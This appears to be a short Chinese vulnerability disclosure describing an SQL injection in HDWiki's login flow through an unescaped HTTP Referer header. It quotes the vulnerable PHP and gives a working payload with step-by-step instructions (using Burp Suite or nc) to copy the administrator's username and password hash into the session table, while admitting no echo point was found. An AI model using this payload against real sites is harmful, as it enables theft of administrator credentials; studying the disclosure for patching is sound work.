HDWIKI鸡肋0day

model/user.class.php：
[php]
function add_referer(){
if($_SERVER['HTTP_REFERER']){
$this->db->query("UPDATE".DB_TABLEPRE."session SET referer='".$_SERVER['HTTP_REFERER']."' WHERE sid='".base::hgetcookie('sid')."'");
}//问题再此
}
functionget_referer(){
$session=$this->db->fetch_first("SELECTreferer FROM ".DB_TABLEPRE."session WHERE sid='".base::hgetcookie('sid')."'");
if($session['referer']==""){
$session['referer']="index.php";
}else{
if(strpos($session['referer'],'admin_')!==false){
$session['referer']="index.php?admin_main";
}
}
return$session['referer'];
}
[/php]

回溯到control/user.php
[php]
function dologin(){
$_ENV['user']->passport_server('login','1');
if(!isset($this->post['submit'])){ //submit为null进入
$this->view->assign('checkcode',isset($this->setting['checkcode'])?$this->setting['checkcode']:0);

$_ENV['user']->add_referer();//登录时注入形成
$_ENV['user']->passport_server('login','2');
$_ENV['user']->passport_client('login');

if(!isset($this->setting['name_min_length'])){$this->setting['name_min_length'] = 3;}
if(!isset($this->setting['name_max_length'])){$this->setting['name_max_length'] = 15;}
$loginTip2= str_replace(array('3','15'),array($this->setting['name_min_length'],$this->setting['name_max_length']),$this->view->lang['loginTip2']);
$this->view->assign('name_min_length',$this->setting['name_min_length']);
$this->view->assign('name_max_length',$this->setting['name_max_length']);
$this->view->assign('loginTip2',$loginTip2);
//$this->view->display('login');
$_ENV['block']->view('login');
}else{

……以下代码省略
[/php]
详细说明：
1、抓登陆包
2、随便建个用户登陆
3、修改包，post内容只保留username和password就好，其他的删掉。
如username=test&password=test
4、使用burpsuite或者nc，修改包头referer，如改为：
[php] admin_',username=(SELECT concat(username,0x2f,password) FROM wiki_user where uid=1)#[/php]
提交后即将管理员账号、密码赋值于wiki_session表的username字段。
因此调用wiki_session.username变量的页面会爆出账号密码（管理员和普通用户同在wiki_user表中）。

注：但是没有找到username或者hdwiki_session表字段回显的地方，鸡肋在此。